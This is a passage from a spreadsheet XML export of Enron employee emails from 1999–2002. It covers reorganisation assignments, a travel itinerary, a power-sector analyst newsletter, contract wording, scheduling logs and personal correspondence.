Patty Wiederholt. I have unofficially notified Anne._x000D_
_x000D_
_x000D_
---------------------- Forwarded by James Saunders/FGT/Enron on 12/06/2000 _x000D_
05:38 PM ---------------------------_x000D_
_x000D_
_x000D_
John Keiser_x000D_
12/06/2000 04:56 PM_x000D_
To: James Saunders/FGT/Enron@ENRON, Rod Hayslett/FGT/Enron@ENRON, Tracy _x000D_
Geaccone/GPGFIN/Enron@ENRON, Elaine Concklin/ET&amp;S/Enron@ENRON, Caroline _x000D_
Barnes/FGT/Enron@ENRON, Steve Gilbert/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Reorg assignments_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
The following have been notified of their new assignments:_x000D_
_x000D_
Working for Keiser:_x000D_
Henry Baker_x000D_
Larry Palma_x000D_
Sally Hsieh_x000D_
_x000D_
Working for Geaccone:_x000D_
Mary Botello_x000D_
_x000D_
Working for Carolyn Barnes:_x000D_
Nancy Carpenter_x000D_
</t>
  </si>
  <si>
    <t>Fri, 30 Jun 2000 06:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Bellingham Cold Storage ISDA Master</t>
  </si>
  <si>
    <t>Your the queen......  thanks for your efforts!!</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 07:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sdelgado_vitoltvl@yahoo.com'})</t>
  </si>
  <si>
    <t>frozenset({'peter.f.keavey@enron.com'})</t>
  </si>
  <si>
    <t>26JUL HOUSTON TO NEW YORK = EMILIE MOISAN = TICKETED</t>
  </si>
  <si>
    <t xml:space="preserve">                                          AGENT JH/SS BOOKING REF_x000D_
ZDJD9T_x000D_
_x000D_
                                          MOISAN/EMILIE_x000D_
_x000D_
_x000D_
  ENRON_x000D_
  1400 SMITH_x000D_
  HOUSTON TX 77002_x000D_
  PETE KEAVEY X37277_x000D_
_x000D_
_x000D_
  DATE:  MAY 11 2001                   ENRON_x000D_
_x000D_
SERVICE               DATE  FROM           TO             DEPART_x000D_
ARRIVE_x000D_
_x000D_
CONTINENTAL AIRLINES  26JUL HOUSTON TX     NEW YORK NY    1058A   328P_x000D_
CO 1969    V          THU   G.BUSH INTERCO LA GUARDIA_x000D_
                            TERMINAL C     TERMINAL M_x000D_
                            SNACK                         NON STOP_x000D_
                            RESERVATION CONFIRMED         3:30 DURATION_x000D_
                  AIRCRAFT: BOEING 737-800_x000D_
                            SEAT 06F NO SMOKING CONFIRMED MOISAN/EMILIE_x000D_
_x000D_
CONTINENTAL AIRLINES  13AUG NEW YORK NY    HOUSTON TX     259P    558P_x000D_
CO 1975    V          MON   LA GUARDIA     G.BUSH INTERCO_x000D_
                            TERMINAL M     TERMINAL C_x000D_
                            SNACK                         NON STOP_x000D_
                            RESERVATION CONFIRMED         3:59 DURATION_x000D_
                  AIRCRAFT: BOEING 737-300_x000D_
                            SEAT 06B NO SMOKING CONFIRMED MOISAN/EMILIE_x000D_
_x000D_
      AIR FARE 241.86       TAX 26.64           TOTAL USD_x000D_
268.50_x000D_
_x000D_
                                        INVOICE TOTAL USD_x000D_
268.50_x000D_
_x000D_
PAYMENT: CCCA5490850070001643/1103/A011317_x000D_
_x000D_
RESERVATION NUMBER(S)  CO/MVMNVT_x000D_
_x000D_
MOISAN/EMILIE                            TICKET:CO/ETKT 005 7028381412_x000D_
_x000D_
**CONTINENTAL RECORD LOCATOR: MVMNVT_x000D_
THIS IS A TICKETLESS RESERVATION. PLEASE HAVE A_x000D_
PICTURE ID AVAILABLE AT THE AIRPORT. THANK YOU_x000D_
**********************************************_x000D_
NON-REFUNDABLE TKT MINIMUM $100.00 CHANGE FEE_x000D_
                  THANK YOU FOR CALLING VITOL TRAVEL_x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Yahoo! Auctions - buy the things you want at great prices_x000D_
http://auctions.yahoo.com/</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 08:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>461026_x000D_
461027_x000D_
jeff_x000D_
_x000D_
broker has 75 mw</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 12:07:46 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: 2002 Plan - Lay Presentation w/Stan</t>
  </si>
  <si>
    <t>yes_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Stark, Cindy  _x000D_
Sent:	Monday, October 29, 2001 1:09 PM_x000D_
To:	Geaccone, Tracy_x000D_
Subject:	FW: 2002 Plan - Lay Presentation w/Stan_x000D_
_x000D_
Jeff Sommers is on track to present for the International group (in Jim's absence) on November 1, right?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Blackwood, Connie  _x000D_
Sent:	Monday, October 29, 2001 12:51 PM_x000D_
To:	Stark, Cindy_x000D_
Subject:	RE: 2002 Plan - Lay Presentation w/Stan_x000D_
_x000D_
Thanks Cindy._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Stark, Cindy  _x000D_
Sent:	Monday, October 29, 2001 12:44 PM_x000D_
To:	Blackwood, Connie_x000D_
Subject:	RE: 2002 Plan - Lay Presentation w/Stan_x000D_
Importance:	High_x000D_
_x000D_
Hello, Connie!    We're going forward, as planned, with the November 1 DRY RUN Budget Review with Stan Horton, and Jeff Sommers will present for the International Group at this meeting on November 1.   _x000D_
_x000D_
We have yet to hear from Causey/Lay about rescheduling the November 8 Budget Plan Review meeting with Mr. Lay.   I will keep you posted on this one._x000D_
_x000D_
Let me know if I need to further clarify anything._x000D_
_x000D_
Cindy_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Blackwood, Connie  _x000D_
Sent:	Monday, October 29, 2001 9:39 AM_x000D_
To:	Stark, Cindy_x000D_
Subject:	2002 Plan - Lay Presentation w/Stan_x000D_
_x000D_
	Cindy,_x000D_
_x000D_
		I spoke with Jim on Friday regarding the above and he told me you were working on rescheduling this meeting.  The meeting is scheduled for Thursday, Nov. 1st.  Jim has to be in Washington on Thursday for a meeting.  Any luck with rescheduling?  _x000D_
_x000D_
Connie Blackwood_x000D_
Enron Global Assets &amp; Services_x000D_
713-646-7421_x000D_
713-646-9510 fax</t>
  </si>
  <si>
    <t>Mon, 14 May 2001 00:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>CSFB Independent Power Weekly-Issue #27</t>
  </si>
  <si>
    <t>Good Morning,_x000D_
_x000D_
Attached, please find the latest issue of our Independent Power Weekly._x000D_
_x000D_
 &lt;&lt;IPW051401.pdf&gt;&gt;_x000D_
_x000D_
Summary:_x000D_
1. IPPs Fall 0.5%   Last week our IPP composite traded off 0.5%,_x000D_
outperforming both the NASDAQ (-3.8%) and the S&amp;P 500 (-1.7%).  Mirant was_x000D_
the strongest performer, rising 7.8%.  AES was the weakest, falling 8.7%._x000D_
_x000D_
2. Investors Focus on Calif. Windfall Profits Tax Proposal   On Monday_x000D_
evening (5/7), the California State Senate passed windfall profits tax bill,_x000D_
calling for a 100% tax on power sales over $80 per Mwh.  We believe the_x000D_
proposal should be seen as a negotiating tactic to force generators to lower_x000D_
prices.  Should the bill get passed in its current form, we believe CPN, MIR_x000D_
and NRG's exposure is limited by their power sales contracts.  Regardless,_x000D_
the bill presents interesting federal/state jurisdictional issues, which_x000D_
could form the basis for a legal challenge._x000D_
_x000D_
3. AES: Time for Investors to Take "Another Look"   On Friday, AES hosted a_x000D_
conference call to address investor concerns regarding Latin America.  On_x000D_
the call, management reaffirmed its prior guidance for 2001 of $1.75 -_x000D_
$1.90.    While we acknowledge the risks presented by the Brazilian_x000D_
situation and the potential for additional negative catalysts, in our view,_x000D_
given current price levels, now is an ideal time for investors to take_x000D_
"another look" at AES.  The stock is trading close to its 52 week valuation_x000D_
trough.  Indeed, we believe it is safe to assume that the market has already_x000D_
priced-in an earnings disappointment.  AES's 52 week median 2001 P/E is_x000D_
27.8x.  If we regard this level as AES's normalized valuation, the market is_x000D_
implying that it will earn about $1.59 in 2001-16% below our base case_x000D_
estimate and 6% below the bottom-end of management's range of guidance.  See_x000D_
our FC note issued today for more details._x000D_
4. Looking Ahead: Mirant Hosting Analyst Meeting on 5/14 and 5/15   MIR will_x000D_
host its first major analyst seminar on May 14 and 15 in Atlanta.  We_x000D_
believe the meeting will be an important catalyst for the stock.  MIR is_x000D_
currently trading at 22.2 times our 2001 EPS estimate, representing a 17%_x000D_
discount to the group average.  Since the beginning of the year, earnings_x000D_
expectations for Mirant have increased by 73%.  We believe MIR's relative_x000D_
valuation discount reflects investor confusion surrounding the drivers of_x000D_
the recent upside as well as skepticism surrounding the sustainability of_x000D_
earnings growth over the next few years.  We believe management will address_x000D_
these issues at the analyst meeting, which should help close some of the_x000D_
valuation gap between MIR and its peers._x000D_
Regards,_x000D_
_x000D_
Neil Stein   212/325-4217_x000D_
Bryan Sifert   212/325-3906_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
This message is for the named person's use only.  It may contain_x000D_
confidential, proprietary or legally privileged information.  No_x000D_
confidentiality or privilege is waived or lost by any mistransmission._x000D_
If you receive this message in error, please immediately delete it and all_x000D_
copies of it from your system, destroy any hard copies of it and notify the_x000D_
sender.  You must not, directly or indirectly, use, disclose, distribute,_x000D_
print, or copy any part of this message if you are not the intended_x000D_
recipient. CREDIT SUISSE GROUP and each of its subsidiaries each reserve_x000D_
the right to monitor all e-mail communications through its networks.  Any_x000D_
views expressed in this message are those of the individual sender, except_x000D_
where the message states otherwise and the sender is authorised to state_x000D_
them to be the views of any such entity._x000D_
Unless otherwise stated, any pricing information given in this message is_x000D_
indicative only, is subject to change and does not constitute an offer to_x000D_
deal at any price quoted._x000D_
Any reference to the terms of executed transactions should be treated as_x000D_
preliminary only and subject to our formal written confirmation._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - IPW051401.pdf</t>
  </si>
  <si>
    <t>Mon, 20 Mar 2000 13:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>New Contract on Transco</t>
  </si>
  <si>
    <t>AGL just sent me a copy of an existing contract on Transco that has been_x000D_
converted to a new type of contract. I assume this is one that is released to_x000D_
us for their Choice program. Who should get the copy and could you please give_x000D_
me a fax number?_x000D_
_x000D_
Jeff</t>
  </si>
  <si>
    <t>Thu, 17 May 2001 01:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'egillaspie@coral-energy.com'})</t>
  </si>
  <si>
    <t>FW: MRS. RUPPERT!</t>
  </si>
  <si>
    <t xml:space="preserve">Jenn forwarded me this, thought you might Enjoy it?!_x000D_
_x000D_
-----_x000D_
                                            Subject:     Re: MRS. RUPPERT!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Greetings!  Wow, I'm back, its hard to believe.  Sitting at my desk trying_x000D_
to get used to being here in the office and having people shout hey Mrs._x000D_
Ruppert is kind of freaky too.  I'm ready for my afternoon siesta which_x000D_
I've_x000D_
become accustomed to in the last couple weeks._x000D_
_x000D_
Well I must say the honeymoon was amazing!  Everything I could have wanted_x000D_
and just what we needed. We truly had a wonderful time.  The trip there was_x000D_
_x000D_
quite exhausting especially after the wedding and all.  we got settled into_x000D_
_x000D_
Athens around 4 p.m. Monday.  Our hotel had a balcony which had a wonderful_x000D_
_x000D_
view of the Acropolis.  Athens is pretty dirty and the Greeks there are_x000D_
kind_x000D_
of assholes, but I really didn't think it was as bad as people kept telling_x000D_
_x000D_
me, I mean its a big city.  We did our own walking tour of all the ruins (I_x000D_
_x000D_
try to avoid large groups of formal tours).  We took a ferry to Santorini_x000D_
and stayed there for 3 days.  Loved it!  We ate some faboulous restaurants_x000D_
on cliffs overlooking the water.  Lots of shrimp, squid, lamb, vegetables,_x000D_
bread and of course my favorite THE WINE! We rented a car one day and drove_x000D_
_x000D_
all over the entire island stopping periodically at various beaches to_x000D_
absorb the rays.  Unfortunately we hadn't anticipated laying out so we_x000D_
didn't bring swimsuits.  As being the sport I am I wanted to be apart of_x000D_
the_x000D_
culture so I took the rays in in just my briefs.  Ryan surprisingly left_x000D_
his_x000D_
shorts on this time???  Loved the black beaches!  We tried to find a more_x000D_
private beach to partake in some skinny dipping, but were busted at our_x000D_
attempt.  We went to an area called Oia on Santorini, which was amazing._x000D_
We_x000D_
drove down the mountain and at the bottom there was this bay area enclosed_x000D_
in rock with a few tavernas.  so we had dinner there and watched the_x000D_
sunset._x000D_
  The most amazing seafood!  They took us in their kitchen to show us what_x000D_
they had caught that day. We also took a boat out to the volcano at Ryan's_x000D_
request being a geologist and all.  We hiked 2 1/2 miles all uphill and_x000D_
then_x000D_
of course back down.  We went to the hot springs which Ryan said wasn't so_x000D_
hot, I did not venture in the water.  After the ride we had to get all the_x000D_
way back to the top so we took donkeys of course.  Quite an adventure as we_x000D_
_x000D_
were weaving around these narrow paths on the edge of the cliff!  Luckily_x000D_
mine was tame, Ryan's however was a jackass(mmm, appropriate I thought)._x000D_
_x000D_
We also took a ferry to Ios, which unfortunately it rained the whole day so_x000D_
_x000D_
we stayed inside, slept and later went to some bars and met some great_x000D_
people which we later went out with that night.  You all should have seen_x000D_
Ryan at the discos!_x000D_
_x000D_
Our final destination was Naxos about a 2 1/2 ferry ride from Santorini._x000D_
Ate, shopped, toured the island, slept on the beach, drank, ate again and_x000D_
slept.  Loved this island a lot.  Not as touristy and the greeks were very_x000D_
pleasant and charming. Would have loved to stay there longer._x000D_
_x000D_
All in all the wedding was fabulous.  I was very happy with the wedding_x000D_
festivities too.  And of course as everyone had said it went by sooo fast._x000D_
_x000D_
The next morning Ryan and I were so confused about what had taken place the_x000D_
_x000D_
night before.  I cannot believe I am a married woman, its all so surreal!_x000D_
The few days prior to the wedding I was so nervous and emotional about_x000D_
everything!  Its just so overwhelming.  One of the best parts was sitting_x000D_
on_x000D_
the alter in the cathedral and looking out upon our friends and family and_x000D_
people's faces lighting up.  Knowing that all those people were there to_x000D_
share in our special moment was just so wonderful.  Of course I wish I_x000D_
could_x000D_
have spent more time chatting with each and everyone one of you.  We were_x000D_
so_x000D_
honored you all traveled so far for us!_x000D_
_x000D_
I am definitely on cloud 9 now and would have to say I feel the happiest_x000D_
I've ever been!  Thanks again for joining us it truly meant a lot.  I hope_x000D_
you all had a wonderful time and enjoyed yourselves.  Everyone was_x000D_
surprisingly on their best behavior...frankly I was a little disappointed_x000D_
in_x000D_
you gals!  Except for Falb she always pulls through with something!_x000D_
Anyway,_x000D_
love to hear from you all soon. Hope everyone is well!_x000D_
_x000D_
Forever Gams!_x000D_
&gt;From: TFalb@aol.com_x000D_
&gt;To: lauragammell@hotmail.com_x000D_
&gt;Subject: MRS. RUPPERT!_x000D_
&gt;Date: Tue, 15 May 2001 00:34:25 EDT_x000D_
&gt;_x000D_
&gt;how was it, girl?  i'm so anxious to hear from you, baby!  write when_x000D_
&gt;things_x000D_
&gt;slow down...._x000D_
&gt;_x000D_
&gt;xxoo, t_x000D_
_x000D_
__________________________________________________________________x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 20 Nov 2000 06:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Fine by me.  I'm supposed to be on vacation this week, but so far I haven't _x000D_
done a very good job of it!_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Scott Healy @ ECT                           11/20/2000 01:55 PM_x000D_
	_x000D_
_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re:  _x000D_
_x000D_
I will review the redlined document tonight.  Will that work with your _x000D_
schedule?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 19 Sep 2001 16:39:26 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bcc3@pge.com'})</t>
  </si>
  <si>
    <t>Kern County power plants</t>
  </si>
  <si>
    <t xml:space="preserve">	Michelle:_x000D_
_x000D_
	It was great to finally talk with you.  Here is some information on_x000D_
the new power plants planned in the Bakersfield area.  This file is a couple_x000D_
of years old and I quickly added in some of the latest information but some_x000D_
of the information here is still quite outdated.  However, this document has_x000D_
some rough diagrams of the area so you can see where the projects are_x000D_
located.  The California Energy Commission has some information on their web_x000D_
site about these projects as well._x000D_
_x000D_
	I'll talk to you soon._x000D_
_x000D_
	Ben Campbell_x000D_
_x000D_
	 &lt;&lt;Kern County Power Plants.doc&gt;&gt; </t>
  </si>
  <si>
    <t>Thu, 26 Oct 2000 02:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: TFX Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Looks good to me--load away.  DF_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Dale Neuner@ECT_x000D_
10/26/2000 09:37 AM_x000D_
To: Martha Benner/ET&amp;S/Enron@ENRON_x000D_
cc: David Forster/Corp/Enron@Enron, Drew Fossum/ET&amp;S/Enron@ENRON, Steve _x000D_
Kirk/ET&amp;S/Enron@ENRON, Dari Dornan/ET&amp;S/Enron@ENRON, Naveed _x000D_
Ahmed/NA/Enron@Enron _x000D_
_x000D_
Subject: Re: TFX Agreement  _x000D_
_x000D_
Please ensure that I have done this as expected and offer your approval, then _x000D_
I'll send for loading._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
MARTHA BENNER @ _x000D_
ENRON        _x000D_
10/26/2000 09:18 AM_x000D_
_x000D_
To: David Forster/Corp/Enron@Enron, Dale Neuner/HOU/ECT@ECT_x000D_
cc: Drew Fossum/ET&amp;S/Enron@ENRON, Steve Kirk/ET&amp;S/Enron@ENRON, Dari _x000D_
Dornan/ET&amp;S/Enron@ENRON _x000D_
Subject: TFX Agreement_x000D_
_x000D_
Per Steve Kirk and Drew Fossum please add the following in the "Other" _x000D_
section of the TFX Agreement:_x000D_
_x000D_
Shipper agrees that if it utilizes Northern's capacity release program to _x000D_
release, on either a temporary or permanent basis, any capacity subject to _x000D_
the discount contained herein at a rate greater than the discounted rate, _x000D_
Shipper shall receive a demand charge credit only for the amount of the _x000D_
discounted rate agreed to herein._x000D_
_x000D_
_x000D_
_x000D_
(Please forward this message to Naved Ahmed.  Thank you.)_x000D_
_x000D_
_x000D_
Martha for Dari Dornan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Nov 1999 00:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ed.quinn@enron.com'})</t>
  </si>
  <si>
    <t>Re: Draft Dial Swaption</t>
  </si>
  <si>
    <t xml:space="preserve">Yes, I'll get to it today.  I've already spoken with Jared.  SS_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Ed Quinn                           11/22/99 08:24 AM_x000D_
	_x000D_
_x000D_
To: Sara Shackleton/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Draft Dial Swaption_x000D_
_x000D_
Sara,_x000D_
_x000D_
Dial's Treasurer is scheduled to meet with their CEO on Tuesday to receive _x000D_
approval for this deal (not a guarantee but he indicated he wants to finalize _x000D_
by Thanksgiving).  If possible, I would like to send him the draft confirm _x000D_
today._x000D_
_x000D_
I know you are busy.  Please call me at 30418 if you this will be a problem.  _x000D_
Thanks._x000D_
_x000D_
Ed Quinn_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 10 Dec 1999 18:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Christmas Tree Farm Pictures</t>
  </si>
  <si>
    <t>http://abacustech.net/pictures/12-10_Christmas_Tree_Farm</t>
  </si>
  <si>
    <t>Sat, 12 Jan 2002 05:36:43 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/12/02; HourAhead hour: 8;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/12/02; HourAhead hour: 8;  No ancillary schedules awarded.  No variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002011208.txt</t>
  </si>
  <si>
    <t>Wed, 9 Jan 2002 07:20:20 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'d..powell@enron.com', 'r..brackett@enron.com', 'stephanie.mcginnis@enron.com'})</t>
  </si>
  <si>
    <t>bankruptcy post-id's</t>
  </si>
  <si>
    <t xml:space="preserve">Jan 8th_x000D_
_x000D_
1459387_x000D_
1459389_x000D_
1459391_x000D_
1459392_x000D_
1459393_x000D_
1459395_x000D_
1459396_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 6 Apr 2001 07:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Revised from Steve Bigalow</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 04/06/2001 _x000D_
02:44 PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  William Smith @ ENRON                           04/06/2001 01:54 PM_x000D_
	_x000D_
_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Revised from Steve Bigalow_x000D_
_x000D_
Vince, _x000D_
_x000D_
I just got this from Steve.  It is his latest version._x000D_
_x000D_
Sam_x000D_
_x000D_
---------------------- Forwarded by William Smith/Corp/Enron on 04/06/2001 _x000D_
01:53 PM ---------------------------_x000D_
_x000D_
_x000D_
Steve Bigalow_x000D_
04/06/2001 01:51 PM_x000D_
To: William.Smith@Enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: 3rd_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'enron.users@enron.com', 'isc.groups@enron.com', 'mark.racey@enron.com', 'enron.list@enron.com'})</t>
  </si>
  <si>
    <t>Introducing the SAP Office Connector!</t>
  </si>
  <si>
    <t xml:space="preserve">View your SAP Inbox directly in Outlook! Introducing the SAP Office=20_x000D_
Connector!=20_x000D_
The SAP Office Connector is a piece of software that seamlessly displays yo=_x000D_
ur=20_x000D_
SAP Office folders as Outlook folders. You already have the SAP Office=20_x000D_
Connector if you have the new SAPGUI 4.6D installed. If you are an SAP user=_x000D_
,=20_x000D_
there are several reasons why you might receive an SAP Office message:=20_x000D_
? You are the agent for an SAP workflow item=20_x000D_
? An error has occurred for which you are the person responsible=20_x000D_
? Someone (or some process) just sent you SAP mail_x000D_
You can launch attached links to SAP transactions directly from Outlook,=20_x000D_
including workflow tasks!_x000D_
Use of the SAP Office Connector is optional. If you use SAP only to enter=_x000D_
=20_x000D_
your timesheet information, you probably won=01,t get much mail in your SAP=_x000D_
=20_x000D_
Inbox - and so probably won=01,t benefit from using this product._x000D_
In most cases, it will make sense to use the SAP Office Connector to view=_x000D_
=20_x000D_
your SAP notifications INSTEAD of forwarding them out of SAP to your Enron=_x000D_
=20_x000D_
Internet mail address.  If you have configured your SAP Office to forward=_x000D_
=20_x000D_
your mail, you should delete the forwarding when you enable the MAPI=20_x000D_
Connector.  See the attached document for more details on forwarding._x000D_
NOTE: there are several SAP systems, including Apollo Production (FI) and H=_x000D_
R=20_x000D_
Production. You (may) have a separate set of SAP Office folders in each=20_x000D_
system. Repeat the setup steps in the attachment for EACH SAP system you wa=_x000D_
nt=20_x000D_
to be displayed as folders in Outlook.=20_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 Jan 2002 12:39:16 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/29/02; HourAhead hour: 15;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/29/02; HourAhead hour: 15;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002012915.txt</t>
  </si>
  <si>
    <t>Tue, 17 Apr 2001 12:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Enron Wholesale Services Legal Monthly Report</t>
  </si>
  <si>
    <t xml:space="preserve">The attached report summarizes current significant legal activities of EWS _x000D_
Legal as of April 15, 2001.  This report does not attempt to list all _x000D_
transactions or include reference to on-going maintenance of completed _x000D_
transactions._x000D_
_x000D_
Please let me know if you have questions._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 03:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>EMAZING Health &amp; Fitness Tip of the Day - Lunging Across The Floor</t>
  </si>
  <si>
    <t>=09=09EMAZING Home[IMAGE]Edit Your ProfilePrivacy_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09Advice and Living - Brain Candy - Business and Money - Comics - Daybr=_x000D_
eakers -=20_x000D_
Entertainment_x000D_
=09=09Espa=0Fol - Games - Good Thoughts - Grapevine - Greetings - Health - =_x000D_
Hobbies -=20_x000D_
Horoscopes_x000D_
=09=09Household Hints - Kitchen - Music - Sports - Style - Technology - Tra=_x000D_
vel -=20_x000D_
Wireless_x000D_
=09=09_x000D_
_x000D_
=09=09[IMAGE]_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09  JobsOnline is giving away $10,000 instant cash!_x000D_
=09=09JobsOnline is one of the Internet's leading sites for employment info=_x000D_
rmation=20_x000D_
and career resources. Search their extensive database of over 200,000 job=_x000D_
=20_x000D_
postings to make your next career move. And use the site=01,s valuable care=_x000D_
er=20_x000D_
resources to assist you in your job search =01) or to succeed in your curre=_x000D_
nt=20_x000D_
position. Click  here for more details.  =20_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09Health &amp; Fitness Tip of the Day_x000D_
=09=09Thursday November 16, 2000_x000D_
=09=09_x000D_
=09=09Lunging Across The Floor =20_x000D_
=09=09_x000D_
=09=09To tone and strengthen hamstrings and gluteus muscles, try performing=_x000D_
 lunges=20_x000D_
across the floor. Start by standing with your feet together, then take a=20_x000D_
giant step forward with your right leg. Let your right knee bend to a=20_x000D_
90-degree angle, so that your hips are on the same level as your right knee=_x000D_
.=20_x000D_
Slowly stand and bring your left leg forward to meet your right leg, so tha=_x000D_
t=20_x000D_
you've taken a big step forward. Perform 10 steps on the right leg, then 10=_x000D_
=20_x000D_
on the left leg. Increase by working up to three sets of 10, and make it ev=_x000D_
en=20_x000D_
harder by holding 10-pound weights in your hands._x000D_
=09=09_x000D_
=09=09- Mariam Ballantine_x000D_
=09=09_x000D_
=09=09Email  this tip to a friend - Browse  the Archives_x000D_
=09=09[IMAGE]_x000D_
=09=09_x000D_
=09=09 HEALTH BOOK OF THE DAY_x000D_
=09=09Robin A. McKenzie: 7 Steps to a Pain-Free Life_x000D_
=09=09_x000D_
=09=09Bush vs. Gore:  the cam-pain continues._x000D_
=09=09Seek relief on the inDecision2000 'Vine._x000D_
=09=09_x000D_
=09=09Got something to say?_x000D_
=09=09Hello...I love you...Congratulations...Thinking of you...Happy birthd=_x000D_
ay.=20_x000D_
Whatever you wanna say, let Emazing's e-greetings say it for you! We have=_x000D_
=20_x000D_
hundreds of the coolest greetings around. They're fun, FREE, and easy to=20_x000D_
send. Click here for more information._x000D_
=09=09_x000D_
=09=09Our e-greetings aren't turkeys..._x000D_
=09=09But we have plenty with turkeys on them to celebrate your holiday=20_x000D_
get-togethers and feasts!_x000D_
=09=09_x000D_
=09=09JobsOnline is giving away $10,000 instant cash!_x000D_
=09=09JobsOnline is one of the Internet's leading sites for employment info=_x000D_
rmation=20_x000D_
and career resources._x000D_
=09=09_x000D_
=09=09     QUOTE OF THE DAY_x000D_
=09=09No one is crueler than an idealist.=20_x000D_
=09=09- Naguib Mahfouz_x000D_
=09=09_x000D_
=09=09 [IMAGE]_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09Check out music for the new millennium on the CD, COMPASSION._x000D_
=09=09A melding of ancient chant, original music, and inspired messages by =_x000D_
His=20_x000D_
Holiness the XIVth Dalai Lama and Thomas Merton chosen to bring the world=_x000D_
=20_x000D_
together in compassion. Click  here for more details.=20_x000D_
=09=09_x000D_
=09=09[IMAGE]_x000D_
=09=09?_x000D_
=09=09Advertise - Company Info - Feedback - Help - Jobs - Privacy Policy - =_x000D_
Terms &amp;=20_x000D_
Conditions_x000D_
=09=09Archives - Edit Your Profile -?Unsubscribe_x000D_
=09=09_x000D_
=09=09EMAZING.com is a service of EMAZING, INC. Copyright 2000. All Rights =_x000D_
Reserved._x000D_
=09=09EMAZING.com - Whatever you're into, we email it to you. FREE!=20_x000D_
[IMAGE]</t>
  </si>
  <si>
    <t>Wed, 7 Feb 2001 02:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Three New CA's</t>
  </si>
  <si>
    <t xml:space="preserve">Just use a regular CA (yes, I changed my mind), describe as a power _x000D_
generation transaction (no equipment reference)._x000D_
_x000D_
Thanks,_x000D_
_x000D_
kay_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Kathleen Carnahan                           02/06/2001 04:53 PM_x000D_
	_x000D_
_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc: Chris Booth/NA/Enron@Enron, Fred Mitro/HOU/ECT@ECT _x000D_
_x000D_
Subject: Three New CA's_x000D_
_x000D_
Kay,_x000D_
_x000D_
I have been asked to do three or more additional CA's for equipment:_x000D_
_x000D_
Chris Booth is dealing with a broker for the potential sale of three _x000D_
different kinds of turbines (end buyer unknown at this time).  I guess we _x000D_
would need a CA for the broker, then CA's with potential buyers._x000D_
_x000D_
Fred Mitro needs a CA for Ryan Company and another for Panda Energy.  (Fred, _x000D_
do you know what kind of turbines these companies are looking at?)._x000D_
_x000D_
